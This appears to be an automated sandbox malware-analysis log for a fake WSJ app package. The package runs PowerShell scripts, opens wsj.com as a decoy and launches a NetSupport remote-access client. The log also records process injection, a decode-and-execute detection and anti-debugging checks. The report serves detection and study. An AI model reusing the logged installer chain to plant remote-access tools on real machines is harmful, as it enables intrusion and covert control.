                                    Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: # BKiMitLJGDL9NaX+nk4vmCIjaQQ2tULiu82AWhbXS7NsVRmPmCQW0LucN/Z0BUZX
                                    Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmCIjaQQ
                                    Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AF_UNIXhreadWndClassHyper-V RAWL
                                    Source: HTCTL32.DLL.26.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                    Source: TCCTL32.DLL.26.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                    Source: powershell.exe, 0000001A.00000002.2193452131.0000023179868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1941852161.0000000005A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: HTCTL32.DLL.26.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                    Source: TCCTL32.DLL.26.drBinary or memory string: VMWare
                                    Source: client32.exe, 00000020.00000002.2492715812.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(Z
                                    Source: C:\ProgramData\netsupport\client\client32.exeAPI call chain: ExitProcess graph end nodegraph_32-96225
                                    Source: C:\ProgramData\netsupport\client\client32.exeAPI call chain: ExitProcess graph end nodegraph_32-96417
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_1115E3E1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,32_2_110CF9F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11029200 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,32_2_11029200
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11178924 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,32_2_11178924
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,32_2_11030A50
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,32_2_11092090
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_1115E3E1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_1116A469
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BED28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_6BED28E1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BED87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_6BED87F5
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Yara detected Powershell decode and execute
                                    Source: Yara matchFile source: amsi64_2564.amsi.csv, type: OTHER
                                    Source: Yara matchFile source: amsi64_7788.amsi.csv, type: OTHER
                                    Maps a DLL or memory area into another process
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonlyJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonlyJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonlyJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonlyJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: readonlyJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\ProgramData\netsupport\client\client32.exe protection: readonlyJump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeSection loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonly
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe32_2_1102FB50
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError,32_2_110F21E0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1110F530 GetKeyState,DeviceIoControl,keybd_event,32_2_1110F530
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"Jump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"Jump to behavior
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
                                    Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,32_2_1109D240
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,32_2_1109D9C0
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                    Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drBinary or memory string: Shell_TrayWnd
                                    Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drBinary or memory string: Progman
                                    Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.drBinary or memory string: Progman<
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,32_2_111700E5
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_11170376
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,32_2_11170419
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoA,32_2_11167A6E
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,32_2_1116FFE3
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_1116FEEE
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,32_2_1117008A
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_111703DD
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,32_2_111702B6
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,32_2_6BEE0F39
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,32_2_6BEE02AD
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,32_2_6BEE2218
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_6BEE21DC
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_6BEE2175
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: EnumSystemLocalesA,32_2_6BEE2151
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,32_2_6BEE2089
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,32_2_6BEEDB7C
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,32_2_6BEDFAE1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,32_2_6BEE1EB8
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,32_2_6BEE1E5D
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,32_2_6BEE1DB6
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_6BEE1CC1
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: GetLocaleInfoA,32_2_6BEEDC99
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,32_2_6BEEDC56
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,32_2_6BEE1257
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,32_2_6BEE1680
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{10030ca7-2d34-4b5d-ab65-42a8a50302a9}_temp.pri VolumeInformationJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Activities.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Workflow.ServiceCore\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Workflow.ServiceCore.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
